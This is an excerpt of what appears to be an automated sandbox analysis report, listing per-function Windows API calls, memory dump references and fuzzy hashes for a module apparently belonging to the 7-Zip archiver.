                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02016D777006909AE706DF6AEA8479E6760F769B94F488422DF4807711DB74D8AAC310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,00000003,?,001D8E1D), ref: 001D8A99
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000003,?,001D8E1D), ref: 001D8AA6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                • Instruction ID: 2c3d5339d01f6a196ead09c9e624078ac3e2e6a5aae4466abe05602e3984a88c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6F0F676B117C093DF248F69D848B582361E759B98F6C4423CE1843B50DF2EC882C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputcfputsfree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2822829076-0
                                                                                                                                                                                                                                • Opcode ID: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                                                                                • Instruction ID: 5c91af377789f2dced0aa7ad3d563bf5dbceda6765cff65db8b2b6fa6ca96b01
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0FE6221494480CA209F25E9553599320E7A9BF8F588321EE7D477E9DF38C9C6C610
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 0020404D
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 00204087
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1415420288-0
                                                                                                                                                                                                                                • Opcode ID: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                                                • Instruction ID: 0ec05b2c9ad13d255c109b4959ef2b37a952131d5d209defe29598fcc6afb460
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E3173772296C596CB31EF14E5942EEB760F7A5340F408426C79D43B66EF38D66ACB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 00204065
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 00204087
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1415420288-0
                                                                                                                                                                                                                                • Opcode ID: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                                                • Instruction ID: 04124cdc18e975a705b0229e3cf581f70afd0d8fa405e4fe3cbda94e08549eb6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 191196A32256C692CB31FB15F0952AEA311E7A1390F408426DB5D47BA6DF78C596CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                • Instruction ID: d3a09df4fc8b7e945a30fab65a8a6a29392507c3659e9be4ab0befaa7856a4ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F08123302A9486DA24AA26E84026D6720AB96FB1F188321DF7917BD1DF24C857C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00210A42
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00210A73
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: GetTickCount.KERNEL32 ref: 0021B49E
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: strcmp.MSVCRT ref: 0021B4E3
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: wcscmp.MSVCRT ref: 0021B502
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: strcmp.MSVCRT ref: 0021B568
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3267814326-0
                                                                                                                                                                                                                                • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                • Instruction ID: 45cd26bed9eada7fc52e55a913da85dc63637ed51bccd7e4e248d02d2917a071
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6F0BE72220A9082E7108F24E8883986370E748BB4F104331EE7D477E8CF3C858AC304
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                • Instruction ID: 28b300f62202594946f405c5701c32af1cbfd82de6dd38c8a591cfcb7e0d4133
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FE0376225854051CE20EB20E45105A6720E7F57F4B482313FABF577F9DF38C645CB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowmalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2436765578-0
                                                                                                                                                                                                                                • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                • Instruction ID: 722b661f1dd57d299a448be7bf8cb935bcd84960ec8ec2a7acb861f434f370d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD01250B276C4D1DE44A75498853545760A7B9740F9450A6F66E01725DA6CC1DF8B01
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                • Instruction ID: 2d75dfb740b0b7d77c11b0a3c125eb24cb897f9cef22762cfacfaf7d8103a544
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8513672644EC496CB62CF26C4602ED3B65F389F98F6D4236DE9A4A719DF34C885C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4236320881-0
                                                                                                                                                                                                                                • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                • Instruction ID: 250956b53e618c9d28acb13f4df2d1ff19c2e7c419260c338a18debc6bb5c955
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E711822621878582E760AB29A5407BE7360E7847A4F644321EFDA577E4EF3CCD85C705
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D8A60: SetFilePointer.KERNELBASE(?,?,00000003,?,001D8E1D), ref: 001D8A99
                                                                                                                                                                                                                                  • Part of subcall function 001D8A60: GetLastError.KERNEL32(?,?,00000003,?,001D8E1D), ref: 001D8AA6
                                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE ref: 001D8CC7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 841452515-0
                                                                                                                                                                                                                                • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                • Instruction ID: a101f5f77360401881e4c10c653d9a0050dbbf1faaabc06f040bd9aab8da8633
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E07D12311894D3E7209FF1A5827EA8324BB457E0F488033AE4943B48CF75CCDAC710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D6464: FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE ref: 001D64F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 534179979-0
                                                                                                                                                                                                                                • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                • Instruction ID: a4937a5bb2940542fc22bed973d1d00687fe5e4e01b2e45103faab73821ccdf9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4ED0A722701765D6FF242BB679457A903152F16BE1E88D031DE4D43355DF694CEBE310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                • Instruction ID: 7ecb91508108ec1b0b411114e5ad5013e617358fed525c7732b9adb22270f9ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAE04676224680CBE744CF60E404B4AB3A0F398B24F000124DE8E83B54CBBCC144CF40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                • Instruction ID: 131fcfd8c411d2b98100dbef955227562d4f376632f16a06b1f13cf2102fefb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5D012B2702504C5FF654FA2E85437523646B68F54F5C5011CE194A340EB2D8895C760
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                • Instruction ID: 97c64856a141aef88b86bf1721a72ee1a2d91246f5f2f8ff11606af8a831a06d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1D0177A614684C6E7008F60E04979AF764F398B64F480104EA8806764CBBCC199CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1795875747-0
                                                                                                                                                                                                                                • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                • Instruction ID: 8b5e5d1cb6e59a5a3061157ba72fc0f89ad10846518829bbdf4ade6afb75bd95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FD0A7D170074991CE109B26E4142696321B758BC8F045021DDAD07314DA2CC1058B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
